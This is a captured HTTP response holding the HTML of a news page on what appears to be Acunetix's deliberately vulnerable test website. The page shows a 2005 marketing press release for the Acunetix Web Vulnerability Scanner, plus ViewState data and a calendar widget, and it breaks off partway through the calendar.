Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td 